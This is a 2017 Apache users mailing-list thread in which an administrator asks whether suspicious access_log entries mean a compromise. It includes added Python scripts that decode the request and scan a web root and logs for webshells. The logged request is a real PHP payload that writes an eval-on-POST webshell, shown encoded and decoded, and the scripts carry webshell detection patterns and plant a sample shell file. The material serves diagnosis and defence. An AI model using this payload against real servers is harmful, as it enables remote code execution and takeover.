Posted to users@httpd.apache.org by "Lentes, Bernd" <be...@helmholtz-muenchen.de> on 2017/02/06 16:14:40 UTC

[users@httpd] am i hacked ?

Hi,

Just now I found two very weird entries in my access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90

What upsets me is that these two requests have status code 200, which means they were successful.
The IP is from Ukraine. Where can I find out what these %-characters mean? Does anyone understand what happened here? It's Apache 2.2.3 64-bit.

Thanks for any hint.

Bernd

-- 
Bernd Lentes 

System administration 
Institute of Developmental Genetics 
Building 35.34 - Room 208 
HelmholtzZentrum München 
bernd.lentes@helmholtz-muenchen.de 
phone: +49 (0)89 3187 1241 
fax: +49 (0)89 3187 2294 

Only once you commit to something can you be wrong 
Scott Adams
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Chair of the Supervisory Board: MinDir'in Baerbel Brumme-Bothe
Managing Directors: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Register court: Amtsgericht Muenchen HRB 6466
VAT ID: DE 129521671


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
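To answer the "what do these %-characters mean" question concretely, here is an added example (not code from the thread) that takes the first log line exactly as posted, URL-decodes the query string and then decodes the base64 argument inside it, so the file the request tries to write becomes readable. It assumes the poster's LogFormat is the common format with one extra numeric field (the "236") in front of the request, which is how the quoted lines look.

```python
"""Decode the access_log request from the post: URL-decode the query
parameter, then unwrap the base64_decode('...') argument inside it."""
import base64
import re
from urllib.parse import unquote

# The first log line from the post, rejoined onto one line (the mail client
# wrapped it in the middle of "DOCUMENT_ROOT").
LOG_LINE = (
    '91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28'
    '%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B'
    '%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3B'
    'file_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27'
    '%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3B'
    'echo%20%27%7C%3C-%27%3B HTTP/1.1" 200 90'
)

# Common log format; the optional "(?:\d+ )?" absorbs the poster's extra
# numeric field before the request (an assumption about their LogFormat).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] (?:\d+ )?'
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)
BASE64_CALL_RE = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
DROP_RE = re.compile(r"file_put_contents\(\s*\$_SERVER\['DOCUMENT_ROOT'\]\s*\.\s*'([^']+)'")
# Code that hands raw request data to an interpreter is a webshell.
WEBSHELL_RE = re.compile(r"(eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)")


def parse_log_line(line):
    """Split one access_log line into its fields; status becomes an int."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError("log line does not match the expected format")
    fields = m.groupdict()
    fields['status'] = int(fields['status'])
    return fields


def decode_query(target):
    """Turn '/?a=b&c=d' into a dict, percent-decoding keys and values."""
    query = target.partition('?')[2]
    params = {}
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        params[unquote(key)] = unquote(value)
    return params


def analyse(line):
    """Decode the request and report what the embedded PHP would do."""
    req = parse_log_line(line)
    php = decode_query(req['target']).get('1', '')
    drop = DROP_RE.search(php)
    # Second layer: the base64 blob is the content written to the dropped file.
    blobs = [base64.b64decode(b).decode('utf-8', 'replace')
             for b in BASE64_CALL_RE.findall(php)]
    return {
        'ip': req['ip'],
        'status': req['status'],
        'php': php,
        'dropped_path': drop.group(1) if drop else None,
        'dropped_content': blobs[0] if blobs else None,
        'is_webshell_dropper': bool(drop) and any(WEBSHELL_RE.search(b) for b in blobs),
    }


if __name__ == '__main__':
    result = analyse(LOG_LINE)
    print('decoded parameter 1:', result['php'])
    print('would write', result['dropped_path'], 'containing:', result['dropped_content'])
    print('webshell dropper:', result['is_webshell_dropper'])
```

The decoded parameter is PHP, not something Apache itself interprets: the 200 only says that "/" was served, and the code runs only if some script on the host passes `$_GET[1]` to `eval()` (an already-present backdoor or a vulnerable application). If it does run, it writes `<?php eval($_POST[1]);?>` to `DOCUMENT_ROOT/webconfig.txt.php`, a one-line shell that executes whatever is later POSTed to it; the `echo '->|'` and `echo '|<-'` bracket the output so the attacker's tool can see from the response body whether the eval happened. The decisive checks are therefore whether that file exists and whether any later request hit it, not the status code of these two lines.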


Re: [users@httpd] am i hacked ?

Posted by "Lentes, Bernd" <be...@helmholtz-muenchen.de>.
----- On Feb 6, 2017, at 5:45 PM, Daniel dferradal@gmail.com wrote:

> Actually now that I re-read the requests it also looks like a successful shellshock
> attempt.
> Operating system software not updated recently either?

> 2017-02-06 17:42 GMT+01:00 Daniel < dferradal@gmail.com > :

>> Have you tried to send those requests yourself and see what you get?
>> Still those requests seem to be aimed at your php framework.

>> Do you use a very old php version as well?

Everything is old: PHP, OS, Apache. That is on my account. It's a system I nearly overlooked, because we use it very rarely.
But nevertheless, it should be updated. I know. And I learn.

 





Re: [users@httpd] am i hacked ?

Posted by Daniel <df...@gmail.com>.
Actually now that I re-read the requests it also looks like a successful
shellshock attempt.

Operating system software not updated recently either?




-- 
*Daniel Ferradal*
IT Specialist

email         dferradal at gmail.com
linkedin     es.linkedin.com/in/danielferradal

Re: [users@httpd] am i hacked ?

Posted by Daniel <df...@gmail.com>.
Have you tried to send those requests yourself and see what you get?

Still those requests seem to be aimed at your php framework.

Do you use a very old php version as well?



-- 
*Daniel Ferradal*
IT Specialist

email         dferradal at gmail.com
linkedin     es.linkedin.com/in/danielferradal

Re: [users@httpd] am i hacked ?

Posted by "Lentes, Bernd" <be...@helmholtz-muenchen.de>.
What I found out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';

Currently I don't understand what this means.
I can't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packets to the network that involve this IP.

Thankful for any tip.


Bernd
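The checks in the reply above (is webconfig.txt.php on disk, did anything else happen) can be made systematic. The following is an added example, not code from the thread: it walks a DocumentRoot for any PHP file whose body hands request data to an interpreter (so it also catches the same dropper sent with a different filename), and it scans access_log lines for requests to the dropped path, since the shell only does something once the attacker POSTs code to it. The DocumentRoot contents and the log lines below are constructed for the demonstration; the extra numeric log field before the request is assumed from the poster's LogFormat.

```python
"""Host and log triage after a webshell-drop request."""
import os
import re
import tempfile

# Bytes patterns so files are scanned as-is, whatever their encoding.
WEBSHELL_PATTERNS = [
    re.compile(rb'(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)'),
    re.compile(rb'(system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(POST|GET|REQUEST)'),
    re.compile(rb'eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\('),
]
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] (?:\d+ )?'
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)


def scan_docroot(docroot):
    """Paths (relative to docroot) whose content looks like a webshell."""
    hits = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, 'rb') as fh:
                data = fh.read(1 << 20)  # droppers are tiny; 1 MiB is plenty
            if any(p.search(data) for p in WEBSHELL_PATTERNS):
                hits.append(os.path.relpath(path, docroot))
    return sorted(hits)


def requests_to(log_lines, dropped_path):
    """(ip, method, status) for every request whose path is the dropped file."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m['target'].partition('?')[0] == dropped_path:
            hits.append((m['ip'], m['method'], int(m['status'])))
    return hits


def triage(docroot, log_lines, dropped_path='/webconfig.txt.php'):
    """Combine the disk scan with the log scan into one verdict."""
    reqs = requests_to(log_lines, dropped_path)
    return {
        'files_with_webshell_code': scan_docroot(docroot),
        'requests_to_dropped_path': reqs,
        # A 200 on a POST to the shell means PHP executed the file, whatever
        # the attacker put in the body; GETs may just be the attacker probing.
        'shell_reached': any(m == 'POST' and s == 200 for _ip, m, s in reqs),
    }


# --- constructed sample data (not real files or real log entries) ----------
SAMPLE_LOG = [
    '91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B HTTP/1.1" 200 90',
    '91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B HTTP/1.1" 200 90',
    '91.200.12.33 - - [06/Feb/2017:16:45:02 +0100] 181 "POST /webconfig.txt.php HTTP/1.1" 200 412',
    '203.0.113.7 - - [06/Feb/2017:16:50:10 +0100] 120 "GET /index.php?page=1 HTTP/1.1" 200 2048',
]


def build_sample_docroot():
    """A throwaway DocumentRoot with one clean file and the dropped shell."""
    docroot = tempfile.mkdtemp(prefix='docroot-')
    with open(os.path.join(docroot, 'index.php'), 'w') as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    with open(os.path.join(docroot, 'webconfig.txt.php'), 'w') as fh:
        fh.write("<?php eval($_POST[1]);?>")  # what the dropper's base64 decodes to
    return docroot


if __name__ == '__main__':
    for key, value in triage(build_sample_docroot(), SAMPLE_LOG).items():
        print(f'{key}: {value}')
```

On the real host, call `triage('/var/www/html', open('/var/log/httpd/access_log'))` with the actual paths. A clean result is reassuring but not proof: the write may have failed on permissions, or the attacker may have removed the file after use, so look for any follow-up requests from the same IP and for recently modified PHP files (`find DOCROOT -name '*.php' -mtime -7`) as well. A host running Apache 2.2.3 with equally old PHP is best rebuilt on supported versions rather than cleaned in place.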
 
